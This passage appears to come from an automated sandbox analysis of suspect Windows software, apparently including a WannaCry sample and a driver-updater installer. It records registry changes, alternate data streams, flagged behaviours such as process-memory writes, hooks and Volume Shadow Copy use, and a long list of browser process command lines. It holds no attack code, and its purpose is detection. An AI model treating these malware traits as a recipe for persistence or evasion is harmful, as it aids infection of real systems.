| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell\open\command\ = "\"C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\Extra\\DriverPro.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open\command\ = "\"C:\\Program Files (x86)\\PC HelpSoft Driver Updater\\PCHelpSoftDriverUpdater.exe\" \"%1\"" | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\PCHelpSoftDriverUpdater.HDM_encrypted\shell | C:\Users\Admin\AppData\Local\Temp\is-451C2.tmp\Driver_Updater_setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\pchsdriver\shell\open\command | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 34330.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 868439.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 345684.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe
"C:\Users\Admin\AppData\Local\Temp\04e16c855515880799c8.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffdd701cc40,0x7ffdd701cc4c,0x7ffdd701cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2032 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1372,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2432 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4596,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4588 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4704 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3716 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4948 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4512,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5600,i,3849777149963785588,15889506016518366527,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4788 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1908 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95fb281a-306d-4ecb-b7fd-a8372fff67c9} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2380 -prefMapHandle 2376 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5122532c-773f-49ec-912f-4eff135e7cf0} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2924 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49b84a38-2da0-4d57-a872-6b87e2caf06a} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {893f0cb9-d884-45a7-bf1a-5edcde9425ff} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4964 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4972 -prefMapHandle 4976 -prefsLen 29198 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1cf06d53-99e3-47e1-8134-413222996f26} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5224 -childID 3 -isForBrowser -prefsHandle 5212 -prefMapHandle 5132 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {30d9dbaf-dbfe-4b91-83a0-5c5f3165858d} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 4 -isForBrowser -prefsHandle 5364 -prefMapHandle 5368 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83cecc9a-0a8c-4c16-81dd-794095eee9af} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5568 -childID 5 -isForBrowser -prefsHandle 5644 -prefMapHandle 5640 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d142aeba-a805-4ef0-85f8-a20a77bc5ad9} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6152 -childID 6 -isForBrowser -prefsHandle 6136 -prefMapHandle 6132 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d27c1d-c058-4e00-88c2-d46abab6f359} 2660 "\\.\pipe\gecko-crash-server-pipe.2660" tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ResizeGet.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2a0,0x2d0,0x7ff7b26c5460,0x7ff7b26c5470,0x7ff7b26c5480
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
